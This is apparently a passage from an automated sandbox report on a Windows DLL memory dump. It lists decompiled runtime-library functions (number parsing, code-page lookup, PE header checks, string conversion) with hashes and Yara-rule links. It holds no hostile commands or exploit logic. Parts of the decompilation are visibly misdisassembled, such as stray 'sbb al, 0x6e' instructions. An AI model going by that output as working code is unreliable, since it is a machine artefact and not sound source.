				 *(_t252 - 0x68) = _t135;
				_t136 = E6E1CA2F1(_t198, __edx, __edi, __esi, __eflags);
				_t240 = _t136;
				_t245 =  *((intOrPtr*)( *_t136 + 0x14));
				 *0x6e22a26c(_t252 - 0x5c, _t135);
				 *((intOrPtr*)( *((intOrPtr*)( *_t136 + 0x14))))();
				 *(_t252 - 4) =  *(_t252 - 4) & 0x00000000;
				_t255 =  *((intOrPtr*)(_t252 - 0x4c));
				if( *((intOrPtr*)(_t252 - 0x4c)) != 0) {
					 *((char*)(_t252 - 0x5e)) = E6E1CDA49(_t240);
				} else {
					 *((char*)(_t252 - 0x5e)) = 0;
				}
				_t141 = E6E1CA0FF(_t198, _t234, _t240, _t245, _t255);
				 *0x6e22a26c("0123456789ABCDEFabcdef-+Xx", 0x6e22ba77, _t252 - 0x2c,  *(_t252 - 0x68));
				 *((intOrPtr*)( *((intOrPtr*)( *_t141 + 0x1c))))();
				_t247 =  *((intOrPtr*)(_t252 - 0x78));
				 *((intOrPtr*)(_t252 - 0x6c)) = _t247;
				_t146 = E6E1CD7A6(_t198,  *((intOrPtr*)(_t252 - 0x70)));
				if(_t146 != 0) {
					L13:
					_t249 =  *(_t252 + 0x18) & 0x00000e00;
					_t242 = 0xa;
					 *(_t252 - 0x68) = _t242;
					if(_t249 != 0x400) {
						__eflags = _t249 - 0x800;
						if(_t249 != 0x800) {
							asm("sbb esi, esi");
							_t251 =  ~_t249 & _t242;
							__eflags = _t251;
							L19:
							 *((char*)(_t252 - 0x5d)) = 0;
							 *((char*)(_t252 - 0x74)) = 0;
							 *((char*)(_t252 - 0x5f)) = 0;
							E6E1CD7A6(_t198,  *((intOrPtr*)(_t252 - 0x70)));
							if(0 != 0) {
								L35:
								__eflags = _t251;
								if(_t251 == 0) {
									L38:
									 *(_t252 - 0x34) =  *(_t252 - 0x34) & 0x00000000;
									 *((intOrPtr*)(_t252 - 0x30)) = 0xf;
									 *(_t252 - 0x44) = 0;
									E6E1C6BD5(_t252 - 0x44, 1,  *((intOrPtr*)(_t252 - 0x74)));
									 *(_t252 - 4) = 1;
									_t243 = 0;
									 *((intOrPtr*)(_t252 - 0x7c)) =  *((intOrPtr*)(_t252 - 0x78)) + 0x1f;
									_t152 = E6E1CD7A6(_t198,  *((intOrPtr*)(_t252 - 0x70)));
									if(_t152 != 0) {
										_t213 =  *((intOrPtr*)(_t252 - 0x30));
										_t153 =  *(_t252 - 0x44);
										L71:
										_t199 =  *((intOrPtr*)(_t252 - 0x5d));
										L72:
										_t235 = _t252 - 0x5c;
										if( *((intOrPtr*)(_t252 - 0x48)) >= 0x10) {
											_t235 =  *((intOrPtr*)(_t252 - 0x5c));
										}
										if(_t199 == 0) {
											L89:
											_t154 =  *((intOrPtr*)(_t252 - 0x78));
											goto L90;
										} else {
											while(_t243 != 0) {
												_t199 =  *_t235;
												if(_t199 == 0x7f) {
													break;
												}
												_t243 = _t243 - 1;
												if(_t243 == 0) {
													L81:
													if(_t243 != 0) {
														L85:
														_t199 = _t235 + 1;
														if( *_t199 > 0) {
															_t235 = _t199;
														}
														continue;
													}
													 *(_t252 - 0x68) = _t252 - 0x44;
													if( *((intOrPtr*)(_t252 - 0x30)) >= 0x10) {
														 *(_t252 - 0x68) = _t153;
													}
													_t213 =  *((intOrPtr*)(_t252 - 0x30));
													if(_t199 <  *( *(_t252 - 0x68))) {
														goto L89;
													} else {
														goto L85;
													}
												}
												 *(_t252 - 0x68) = _t252 - 0x44;
												_t160 =  *(_t252 - 0x44);
												if(_t213 >= 0x10) {
													_t213 =  *((intOrPtr*)(_t252 - 0x30));
													 *(_t252 - 0x68) = _t160;
												}
												_t153 =  *(_t252 - 0x44);
												if(_t199 !=  *((intOrPtr*)( *(_t252 - 0x68) + _t243))) {
													goto L89;
												} else {
													goto L81;
												}
											}
											__eflags =  *((char*)(_t252 - 0x5f));
											_t154 =  *((intOrPtr*)(_t252 - 0x6c));
											if( *((char*)(_t252 - 0x5f)) == 0) {
												 *_t154 = 0x30;
												_t154 = _t154 + 1;
											}
											L90:
											 *_t154 = 0;
											E6E1C2B76(_t252 - 0x44);
											E6E1C2B76(_t252 - 0x5c);
											return E6E1E008A(_t251, _t199, _t243, _t251);
										}
									}
									 *((char*)(_t252 - 0x74)) = _t152;
									do {
										if( *((char*)(_t198 + 4)) == 0) {
											E6E1CC59E(_t198);
										}
										_push( *((intOrPtr*)(_t252 - 0x74)));
										 *((char*)(_t252 - 0x64)) =  *((intOrPtr*)(_t198 + 5));
										_t166 = E6E1C9DF2(_t252 - 0x2c, _t252 - 0x12, _t252 - 0x64);
										_t253 = _t253 + 0x10;
										_t167 = _t166 - _t252 - 0x2c;
										if(_t167 >=  *(_t252 - 0x68)) {
											_t213 =  *((intOrPtr*)(_t252 - 0x30));
											_t236 = _t252 - 0x44;
											_t153 =  *(_t252 - 0x44);
											__eflags = _t213 - 0x10;
											if(_t213 >= 0x10) {
												_t236 = _t153;
											}
											__eflags =  *((char*)(_t236 + _t243));
											if( *((char*)(_t236 + _t243)) == 0) {
												L64:
												if(_t243 == 0) {
													goto L71;
												}
												_t237 = _t252 - 0x44;
												if(_t213 >= 0x10) {
													_t237 = _t153;
												}
												if( *((char*)(_t237 + _t243)) <= 0) {
													_t199 = 0;
													goto L72;
												} else {
													_t243 = _t243 + 1;
													goto L71;
												}
											} else {
												__eflags =  *((char*)(_t252 - 0x5e));
												if( *((char*)(_t252 - 0x5e)) == 0) {
													goto L64;
												}
												__eflags =  *((char*)(_t198 + 4));
												if( *((char*)(_t198 + 4)) != 0) {
													_t238 =  *((intOrPtr*)(_t252 - 0x64));
												} else {
													E6E1CC59E(_t198);
													_t238 =  *((intOrPtr*)(_t198 + 5));
													_t213 =  *((intOrPtr*)(_t252 - 0x30));
													_t153 =  *(_t252 - 0x44);
												}
												__eflags = _t238 -  *((intOrPtr*)(_t252 - 0x5e));
												if(_t238 !=  *((intOrPtr*)(_t252 - 0x5e))) {
													goto L64;
												} else {
													E6E1C86F2(_t252 - 0x44, 0);
													_t243 = _t243 + 1;
													__eflags = _t243;
													goto L62;
												}
											}
										} else {
											_t224 =  *((intOrPtr*)(_t167 + "0123456789ABCDEFabcdef-+Xx"));
											_t173 =  *((intOrPtr*)(_t252 - 0x6c));
											 *_t173 = _t224;
											if( *((char*)(_t252 - 0x5f)) != 0 || _t224 != 0x30) {
												if(_t173 <  *((intOrPtr*)(_t252 - 0x7c))) {
													 *((char*)(_t252 - 0x5f)) = 1;
													 *((intOrPtr*)(_t252 - 0x6c)) = _t173 + 1;
												}
											}
											_t174 = _t252 - 0x44;
											 *((char*)(_t252 - 0x5d)) = 1;
											if( *((intOrPtr*)(_t252 - 0x30)) >= 0x10) {
												_t174 =  *(_t252 - 0x44);
											}
											if( *((char*)(_t174 + _t243)) != 0x7f) {
												_t175 = _t252 - 0x44;
												if( *((intOrPtr*)(_t252 - 0x30)) >= 0x10) {
													_t175 =  *(_t252 - 0x44);
												}
												 *((char*)(_t175 + _t243)) =  *((char*)(_t175 + _t243)) + 1;
											}
										}
										L62:
										E6E1CBD8B(_t198);
									} while (E6E1CD7A6(_t198,  *((intOrPtr*)(_t252 - 0x70))) == 0);
									_t213 =  *((intOrPtr*)(_t252 - 0x30));
									_t153 =  *(_t252 - 0x44);
									goto L64;
								}
								L36:
								__eflags = _t251 - _t242;
								if(_t251 == _t242) {
									goto L38;
								}
								L37:
								 *(_t252 - 0x68) = ((0 | _t251 != 0x00000008) - 0x00000001 & 0xfffffff2) + 0x16;
								goto L38;
							}
							if( *((intOrPtr*)(_t198 + 4)) == 0) {
								E6E1CC59E(_t198);
							}
							if( *((intOrPtr*)(_t198 + 5)) !=  *((intOrPtr*)(_t252 - 0x2c))) {
								goto L35;
							} else {
								 *((char*)(_t252 - 0x5d)) = 1;
								 *((char*)(_t252 - 0x74)) = 1;
								E6E1CBD8B(_t198);
								_t185 = E6E1CD7A6(_t198,  *((intOrPtr*)(_t252 - 0x70)));
								if(1 != 0) {
									L33:
									__eflags = _t251;
									if(_t251 != 0) {
										goto L36;
									}
									_t251 = 8;
									goto L35;
								}
								if( *((intOrPtr*)(_t198 + 4)) == _t185) {
									E6E1CC59E(_t198);
								}
								_t186 =  *((intOrPtr*)(_t198 + 5));
								if(_t186 ==  *((intOrPtr*)(_t252 - 0x13))) {
									L30:
									if(_t251 == 0 || _t251 == 0x10) {
										_t251 = 0x10;
										 *((char*)(_t252 - 0x5d)) = 0;
										 *((char*)(_t252 - 0x74)) = 0;
										E6E1CBD8B(_t198);
										goto L37;
									} else {
										goto L33;
									}
								} else {
									if( *((char*)(_t198 + 4)) == 0) {
										E6E1CC59E(_t198);
										_t186 =  *((intOrPtr*)(_t198 + 5));
									}
									if(_t186 !=  *((intOrPtr*)(_t252 - 0x14))) {
										goto L33;
									} else {
										goto L30;
									}
								}
							}
						}
						_push(0x10);
						L17:
						_pop(_t251);
						goto L19;
					}
					_push(8);
					goto L17;
				} else {
					if( *((intOrPtr*)(_t198 + 4)) == _t146) {
						E6E1CC59E(_t198);
					}
					_t192 =  *((intOrPtr*)(_t198 + 5));
					if(_t192 !=  *((intOrPtr*)(_t252 - 0x15))) {
						__eflags =  *((char*)(_t198 + 4));
						if( *((char*)(_t198 + 4)) == 0) {
							E6E1CC59E(_t198);
							_t192 =  *((intOrPtr*)(_t198 + 5));
						}
						__eflags = _t192 -  *((intOrPtr*)(_t252 - 0x16));
						if(_t192 !=  *((intOrPtr*)(_t252 - 0x16))) {
							goto L13;
						} else {
							 *_t247 = 0x2d;
							goto L12;
						}
					} else {
						 *_t247 = 0x2b;
						L12:
						 *((intOrPtr*)(_t252 - 0x6c)) = _t247 + 1;
						E6E1CBD8B(_t198);
						goto L13;
					}
				}
			}

APIs

__EH_prolog3_GS.LIBCMT ref: 6E1CB96F

Part of subcall function 6E1CA2F1: __EH_prolog3.LIBCMT ref: 6E1CA2F8
Part of subcall function 6E1CA2F1: std::_Lockit::_Lockit.LIBCPMT ref: 6E1CA302
Part of subcall function 6E1CA2F1: int.LIBCPMT ref: 6E1CA319
Part of subcall function 6E1CA2F1: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1CA373

_Find_unchecked1.LIBCPMT ref: 6E1CBB80

Strings

0123456789ABCDEFabcdef-+Xx, xrefs: 6E1CB9D7

Memory Dump Source

Source File: 00000016.00000002.570061995.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000016.00000002.569060574.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000016.00000002.596415964.000000006E22A000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Lockitstd::_$Find_unchecked1H_prolog3H_prolog3_Lockit::_Lockit::~_
String ID: 0123456789ABCDEFabcdef-+Xx
API String ID: 1853221402-2799312399
Opcode ID: 90473d4002a40e4a3fbe52c2bc09807ac92a51d8fd29f6f4f9b063ee4b54f4fa
Instruction ID: 803cfd694f67ef58b20ffc7911cc71338604d9d4723fbeec1d6103b687c5b55e
Opcode Fuzzy Hash: 90473d4002a40e4a3fbe52c2bc09807ac92a51d8fd29f6f4f9b063ee4b54f4fa
Instruction Fuzzy Hash: C3C19130E042888EDF11CBE4C490BECBB76AF35B04F645859D495EB24ECB7899C5EB52

Uniqueness

Uniqueness Score: -1.00%

Function 6E2060ED, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 194COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 6E20617D

Strings

pow, xrefs: 6E206155, 6E206172

Memory Dump Source

Source File: 00000016.00000002.570061995.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000016.00000002.569060574.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000016.00000002.596415964.000000006E22A000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ErrorHandling__start
String ID: pow
API String ID: 3213639722-2276729525
Opcode ID: c683df2aca92b342ffb4dbbe92653e6ac082a28f7be494f92079c2ce96a8c05b
Instruction ID: f3613378f1900d2b91a3137b18dde044b61d42383b3e9c695cae3ce6ff11752c
Opcode Fuzzy Hash: c683df2aca92b342ffb4dbbe92653e6ac082a28f7be494f92079c2ce96a8c05b
Instruction Fuzzy Hash: 0651AF6193C20F8BDB4166D4C9903DA77E7EB83702F304D58E191427DDEB3185C5DA92

Uniqueness

Uniqueness Score: -1.00%

Function 6E21DBAF, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E6E21DBAF(void* __ecx, signed int _a4, intOrPtr _a8) {
				int _v8;
				int _t15;
				int _t16;
				signed int _t17;
				signed int _t23;
				signed int _t25;
				signed int _t26;
				signed int _t27;
				void* _t30;
				void* _t31;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr* _t36;
				intOrPtr* _t37;

				_push(__ecx);
				_t23 = _a4;
				if(_t23 == 0) {
					L21:
					_t15 = E6E214323(_t23, __eflags, _a8 + 0x250, 0x20001004,  &_v8, 2);
					__eflags = _t15;
					if(_t15 != 0) {
						_t16 = _v8;
						__eflags = _t16;
						if(_t16 == 0) {
							_t16 = GetACP();
						}
						L25:
						return _t16;
					}
					L22:
					_t16 = 0;
					goto L25;
				}
				_t17 = 0;
				if( *_t23 == 0) {
					goto L21;
				}
				_t36 = 0x6e232f08;
				_t25 = _t23;
				while(1) {
					_t30 =  *_t25;
					if(_t30 !=  *_t36) {
						break;
					}
					if(_t30 == 0) {
						L7:
						_t26 = _t17;
						L9:
						if(_t26 == 0) {
							goto L21;
						}
						_t37 = 0x6e232f10;
						_t27 = _t23;
						while(1) {
							_t31 =  *_t27;
							if(_t31 !=  *_t37) {
								break;
							}
							if(_t31 == 0) {
								L17:
								_t49 = _t17;
								if(_t17 != 0) {
									_t16 = E6E20BF09(_t23, _t23);
									goto L25;
								}
								if(E6E214323(_t23, _t49, _a8 + 0x250, 0x2000000b,  &_v8, 2) == 0) {
									goto L22;
								}
								_t16 = _v8;
								goto L25;
							}
							_t32 =  *((intOrPtr*)(_t27 + 2));
							if(_t32 !=  *((intOrPtr*)(_t37 + 2))) {
								break;
							}
							_t27 = _t27 + 4;
							_t37 = _t37 + 4;
							if(_t32 != 0) {
								continue;
							}
							goto L17;
						}
						asm("sbb eax, eax");
						_t17 = _t17 | 0x00000001;
						__eflags = _t17;
						goto L17;
					}
					_t33 =  *((intOrPtr*)(_t25 + 2));
					if(_t33 !=  *((intOrPtr*)(_t36 + 2))) {
						break;
					}
					_t25 = _t25 + 4;
					_t36 = _t36 + 4;
					if(_t33 != 0) {
						continue;
					}
					goto L7;
				}
				asm("sbb edx, edx");
				_t26 = _t25 | 0x00000001;
				__eflags = _t26;
				goto L9;
			}

APIs

GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,6E21DE50,?,00000050,?,?,?,?,?), ref: 6E21DC8A

Strings

OCP, xrefs: 6E21DC03
ACP, xrefs: 6E21DBCD

Memory Dump Source

Source File: 00000016.00000002.570061995.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000016.00000002.569060574.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000016.00000002.596415964.000000006E22A000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID: ACP$OCP
API String ID: 0-711371036
Opcode ID: c84d1527493b51f6569ece9e767e8a1da9986feae1579f2e871e0b4c58f2ff79
Instruction ID: 9f17a92a16cda4825a0bcc254d2ae07db7a6c7eda77fa65fc14e89dd83e6a013
Opcode Fuzzy Hash: c84d1527493b51f6569ece9e767e8a1da9986feae1579f2e871e0b4c58f2ff79
Instruction Fuzzy Hash: AB21A366A5C10EE7D3548ED9C940BC763EBAB44B57F528C24EB0AD7208E762DB418A90

Uniqueness

Uniqueness Score: -1.00%

Function 6E1DFAE9, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 65
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E6E1DFAE9(void* __ebx, void* __edx, signed int _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t19;
				signed int _t23;
				signed int _t24;
				signed int _t25;
				signed int _t26;
				signed int _t30;
				intOrPtr _t31;
				signed int _t34;
				void* _t49;
				signed int _t55;

				if( *0x6e286e51 == 0) {
					_t55 = _a4;
					__eflags = _t55;
					if(_t55 == 0) {
						L4:
						_t19 = E6E1E079B();
						__eflags = _t19;
						if(_t19 == 0) {
							L9:
							_push(_t49);
							_push(0x20);
							asm("ror eax, cl");
							_t23 = ( *0x6e28506c & 0x0000001f | 0xffffffff) ^  *0x6e28506c;
							__eflags = _t23;
							_v16 = _t23;
							_v12 = _t23;
							_v8 = _t23;
							asm("movsd");
							asm("movsd");
							asm("movsd");
							_v16 = _t23;
							_v12 = _t23;
							_v8 = _t23;
							asm("movsd");
							asm("movsd");
							asm("movsd");
							goto L10;
						} else {
							__eflags = _t55;
							if(_t55 != 0) {
								goto L9;
							} else {
								_t25 = E6E20A8CA(_t19, 0x6e286e54);
								__eflags = _t25;
								if(_t25 != 0) {
									L8:
									_t24 = 0;
								} else {
									_t26 = E6E20A8CA(_t25, 0x6e286e60);
									__eflags = _t26;
									if(_t26 == 0) {
										L10:
										 *0x6e286e51 = 1;
										_t24 = 1;
									} else {
										goto L8;
									}
								}
							}
						}
						return _t24;
					} else {
						__eflags = _t55 - 1;
						if(_t55 != 1) {
							E6E1E07A7(__edx, _t49, _t55, 5);
							asm("int3");
							E6E1E0990(__ebx, _t49, 0x6e282780, 8);
							_v8 = _v8 & 0x00000000;
							__eflags =  *0x6e1a0000 - 0x5a4d; // 0x5a4d
							if(__eflags != 0) {
								L19:
								_v8 = 0xfffffffe;
								_t30 = 0;
								__eflags = 0;
							} else {
								_t31 =  *0x6e1a003c; // 0x100
								__eflags =  *((intOrPtr*)(_t31 + 0x6e1a0000)) - 0x4550;
								if( *((intOrPtr*)(_t31 + 0x6e1a0000)) != 0x4550) {
									goto L19;
								} else {
									__eflags =  *((intOrPtr*)(_t31 + 0x6e1a0018)) - 0x10b;
									if( *((intOrPtr*)(_t31 + 0x6e1a0018)) != 0x10b) {
										goto L19;
									} else {
										_t34 = E6E1DF931(0x6e1a0000, _a4 - 0x6e1a0000);
										__eflags = _t34;
										if(_t34 == 0) {
											goto L19;
										} else {
											__eflags =  *(_t34 + 0x24);
											if( *(_t34 + 0x24) < 0) {
												goto L19;
											} else {
												_v8 = 0xfffffffe;
												_t30 = 1;
											}
										}
									}
								}
							}
							 *[fs:0x0] = _v20;
							return _t30;
						} else {
							goto L4;
						}
					}
				} else {
					return 1;
				}
			}

0x6e1dfaf6
0x6e1dfafd
0x6e1dfb00
0x6e1dfb02
0x6e1dfb09
0x6e1dfb09
0x6e1dfb0e
0x6e1dfb10
0x6e1dfb38
0x6e1dfb40
0x6e1dfb49
0x6e1dfb51
0x6e1dfb53
0x6e1dfb53
0x6e1dfb59
0x6e1dfb5c
0x6e1dfb5f
0x6e1dfb62
0x6e1dfb63
0x6e1dfb64
0x6e1dfb6a
0x6e1dfb6d
0x6e1dfb73
0x6e1dfb76
0x6e1dfb77
0x6e1dfb78
0x00000000
0x6e1dfb12
0x6e1dfb12
0x6e1dfb14
0x00000000
0x6e1dfb16
0x6e1dfb1b
0x6e1dfb21
0x6e1dfb23
0x6e1dfb34
0x6e1dfb34
0x6e1dfb25
0x6e1dfb2a
0x6e1dfb30
0x6e1dfb32
0x6e1dfb7a
0x6e1dfb7a
0x6e1dfb81
0x00000000
0x00000000
0x00000000
0x6e1dfb32
0x6e1dfb23
0x6e1dfb14
0x6e1dfb85
0x6e1dfb04
0x6e1dfb04
0x6e1dfb07
0x6e1dfb88
0x6e1dfb8d
0x6e1dfb95
0x6e1dfb9a
0x6e1dfba3
0x6e1dfbaa
0x6e1dfc09
0x6e1dfc09
0x6e1dfc10
0x6e1dfc10
0x6e1dfbac
0x6e1dfbac
0x6e1dfbb1
0x6e1dfbbb
0x00000000
0x6e1dfbbd
0x6e1dfbc2
0x6e1dfbc9
0x00000000
0x6e1dfbcb
0x6e1dfbd7
0x6e1dfbde
0x6e1dfbe0
0x00000000
0x6e1dfbe2
0x6e1dfbe2
0x6e1dfbe6
0x00000000
0x6e1dfbe8
0x6e1dfbe8
0x6e1dfbef
0x6e1dfbef
0x6e1dfbe6
0x6e1dfbe0
0x6e1dfbc9
0x6e1dfbbb
0x6e1dfc15
0x6e1dfc21
0x00000000
0x00000000
0x00000000
0x6e1dfb07
0x6e1dfaf8
0x6e1dfafb
0x6e1dfafb

Strings

`n(n, xrefs: 6E1DFB65
Tn(n, xrefs: 6E1DFB44

Memory Dump Source

Source File: 00000016.00000002.570061995.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000016.00000002.569060574.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000016.00000002.596415964.000000006E22A000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID: Tn(n$`n(n
API String ID: 0-2013517204
Opcode ID: a67b70733c7e2a9c387ae21831bc05a5e735ed5de6b4c4dfebe7aa221ac9da4f
Instruction ID: a743afd1c265a9cfc6ca234d763fe1ddabe393680eee35139bf46a47973bf8e6
Opcode Fuzzy Hash: a67b70733c7e2a9c387ae21831bc05a5e735ed5de6b4c4dfebe7aa221ac9da4f
Instruction Fuzzy Hash: 9011E732C20A199BCF40CEE8C8547CF77E6AB1A324F254155DC30EB281D6B0C6899BA1

Uniqueness

Uniqueness Score: -1.00%

Function 6E1C3751, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 61%

			E6E1C3751(void* __ebx, signed int* __ecx, signed char* __edi, void* __esi) {
				signed int _t18;
				intOrPtr* _t26;
				signed int _t29;
				signed char _t33;
				void* _t35;
				signed char _t40;
				void* _t41;
				intOrPtr* _t42;

				E6E1E00E0(0x6e228012, __ebx, __edi, __esi, 0x38);
				_t40 = __ecx;
				_t33 =  *((intOrPtr*)(_t41 + 8));
				_t18 = _t33 & 0x000000ff;
				if(_t18 > 8) {
					 *__ecx =  *__ecx & 0x00000000;
					__eflags = _t33;
					if(_t33 != 0) {
						goto L4;
					} else {
						E6E1C1F9A(_t41 - 0x28, "961c151d2e87f2686a955a9be24d316f1362bf21 3.9.1");
						_t7 = _t41 - 4;
						 *_t7 =  *(_t41 - 4) & 0x00000000;
						__eflags =  *_t7;
						_t35 = _t41 - 0x44;
						E6E1C0C7C(__ebx, _t35, __edi, _t40,  *_t7);
						 *_t42 = 0x6e283430;
						E6E1E3D74(_t41 - 0x44, _t41 - 0x28);
						asm("scasb");
						asm("aaa");
						asm("sbb al, 0x6e");
						if(__eflags >= 0) {
							_t26 =  *((intOrPtr*)(_t42 + 4));
							 *_t26 =  *((intOrPtr*)(_t35 + 4));
							return _t26;
						} else {
							asm("sbb al, 0x6e");
							 *__edi =  *__edi ^ 0x0000001c;
							asm("outsb");
							 *__edi = _t40;
							asm("sbb al, 0x6e");
							asm("aaa");
							asm("sbb al, 0x6e");
							asm("pushfd");
							asm("aaa");
							asm("sbb al, 0x6e");
							asm("pushfd");
							asm("aaa");
							asm("sbb al, 0x6e");
							asm("movsd");
							asm("aaa");
							asm("sbb al, 0x6e");
							asm("aaa");
							asm("sbb al, 0x6e");
							_t29 =  *((intOrPtr*)(_t35 + 4)) - 0x10;
							__eflags = _t29;
							return _t29;
						}
					}
				} else {
					switch( *((intOrPtr*)(_t18 * 4 +  &M6E1C37E9))) {
						case 0:
							 *__esi =  *__esi & 0x00000000;
							goto L4;
						case 1:
							_t30 = E6E1C4B1C(__ebx, __edi, __ecx, _t43);
							goto L3;
						case 2:
							__eax = E6E1C4B64(__eflags);
							goto L3;
						case 3:
							__eax = E6E1C4B87(__ebx, __edi, __esi, __eflags);
							goto L3;
						case 4:
							 *__esi = 0;
							goto L4;
						case 5:
							 *__esi =  *__esi & 0x00000000;
							__esi[1] = __esi[1] & 0x00000000;
							goto L4;
						case 6:
							asm("xorps xmm0, xmm0");
							asm("movsd [esi], xmm0");
							goto L4;
						case 7:
							__eax = E6E1C4BCF(__eflags);
							L3:
							 *_t40 = _t30;
							L4:
							return E6E1E008A(_t40, _t31, _t37, _t40);
							goto L16;
					}
				}
				L16:
			}

APIs

__EH_prolog3_GS.LIBCMT ref: 6E1C3758
__CxxThrowException@8.LIBVCRUNTIME ref: 6E1C37E2

Strings

961c151d2e87f2686a955a9be24d316f1362bf21 3.9.1, xrefs: 6E1C37BA

Memory Dump Source

Source File: 00000016.00000002.570061995.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000016.00000002.569060574.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000016.00000002.596415964.000000006E22A000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Exception@8H_prolog3_Throw
String ID: 961c151d2e87f2686a955a9be24d316f1362bf21 3.9.1
API String ID: 2985221223-1287915644
Opcode ID: b7dc19540fc3f1d3fe9f8ce1a56bfd3b506352e061fe14ec78b309a13141e6ff
Instruction ID: 7994b61858e4c82c4b8ab1f20c9c6cd6458cc7842447dffe1bd79a77a21730aa
Opcode Fuzzy Hash: b7dc19540fc3f1d3fe9f8ce1a56bfd3b506352e061fe14ec78b309a13141e6ff
Instruction Fuzzy Hash: 4E018BB1848704AFD302DBE4C4487ECB2E8AF37B16F21499AD180D2140EB7C0AC6EB53

Uniqueness

Uniqueness Score: -1.00%

Function 6E214B79, Relevance: 5.1, APIs: 4, Instructions: 139
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E214B79(void* __edx, short* _a4, char* _a8, int _a12, intOrPtr _a16) {
				char* _v8;
				int _v12;
				char _v16;
				char _v24;
				char _v28;
				void* __ebx;
				char _t34;
				int _t35;
				int _t38;
				long _t39;
				char* _t42;
				int _t44;
				int _t47;
				int _t53;
				intOrPtr _t55;
				void* _t56;
				char* _t57;
				char* _t62;
				char* _t63;
				void* _t64;
				int _t65;
				short* _t67;
				short* _t68;
				int _t69;
				intOrPtr* _t70;

				_t64 = __edx;
				_t53 = _a12;
				_t67 = _a4;
				_t68 = 0;
				if(_t67 == 0) {
					L3:
					if(_a8 != _t68) {
						E6E1F1F60(_t53,  &_v28, _t64, _a16);
						_t34 = _v24;
						__eflags = _t67;
						if(_t67 == 0) {
							__eflags =  *((intOrPtr*)(_t34 + 0xa8)) - _t68;
							if( *((intOrPtr*)(_t34 + 0xa8)) != _t68) {
								_t69 = _t68 | 0xffffffff;
								_t35 = MultiByteToWideChar( *(_t34 + 8), 9, _a8, _t69, _t68, _t68);
								__eflags = _t35;
								if(_t35 != 0) {
									L29:
									_t28 = _t35 - 1; // -1
									_t69 = _t28;
									L30:
									__eflags = _v16;
									if(_v16 != 0) {
										_t55 = _v28;
										_t31 = _t55 + 0x350;
										 *_t31 =  *(_t55 + 0x350) & 0xfffffffd;
										__eflags =  *_t31;
									}
									return _t69;
								}
								 *((intOrPtr*)(E6E202281())) = 0x2a;
								goto L30;
							}
							_t70 = _a8;
							_t25 = _t70 + 1; // 0x1
							_t56 = _t25;
							do {
								_t38 =  *_t70;
								_t70 = _t70 + 1;
								__eflags = _t38;
							} while (_t38 != 0);
							_t69 = _t70 - _t56;
							goto L30;
						}
						__eflags =  *((intOrPtr*)(_t34 + 0xa8)) - _t68;
						if( *((intOrPtr*)(_t34 + 0xa8)) != _t68) {
							_t69 = _t68 | 0xffffffff;
							_t35 = MultiByteToWideChar( *(_t34 + 8), 9, _a8, _t69, _t67, _t53);
							__eflags = _t35;
							if(_t35 != 0) {
								goto L29;
							}
							_t39 = GetLastError();
							__eflags = _t39 - 0x7a;
							if(_t39 != 0x7a) {
								L21:
								 *((intOrPtr*)(E6E202281())) = 0x2a;
								 *_t67 = 0;
								goto L30;
							}
							_t42 = _a8;
							_t57 = _t42;
							_v8 = _t57;
							_t65 = _t53;
							__eflags = _t53;
							if(_t53 == 0) {
								L20:
								_t44 = MultiByteToWideChar( *(_v24 + 8), 1, _t42, _t57 - _t42, _t67, _t53);
								__eflags = _t44;
								if(_t44 != 0) {
									_t69 = _t44;
									goto L30;
								}
								goto L21;
							} else {
								goto L15;
							}
							while(1) {
								L15:
								_t45 =  *_t57;
								_v12 = _t65 - 1;
								__eflags =  *_t57;
								if(__eflags == 0) {
									break;
								}
								_t47 = E6E218CAB(__eflags, _t45 & 0x000000ff,  &_v24);
								_t62 = _v8;
								__eflags = _t47;
								if(_t47 == 0) {
									L18:
									_t65 = _v12;
									_t57 = _t62 + 1;
									_v8 = _t57;
									__eflags = _t65;
									if(_t65 != 0) {
										continue;
									}
									break;
								}
								_t62 = _t62 + 1;
								__eflags =  *_t62;
								if( *_t62 == 0) {
									goto L21;
								}
								goto L18;
							}
							_t42 = _a8;
							goto L20;
						}
						__eflags = _t53;
						if(_t53 == 0) {
							goto L30;
						}
						_t63 = _a8;
						while(1) {
							 *_t67 =  *(_t68 + _t63) & 0x000000ff;
							__eflags =  *(_t68 + _t63);
							if( *(_t68 + _t63) == 0) {
								goto L30;
							}
							_t68 =  &(_t68[0]);
							_t67 =  &(_t67[1]);
							__eflags = _t68 - _t53;
							if(_t68 < _t53) {
								continue;
							}
							goto L30;
						}
						goto L30;
					}
					 *((intOrPtr*)(E6E202281())) = 0x16;
					return E6E20215B() | 0xffffffff;
				}
				if(_t53 != 0) {
					 *_t67 = 0;
					goto L3;
				}
				return 0;
			}

APIs

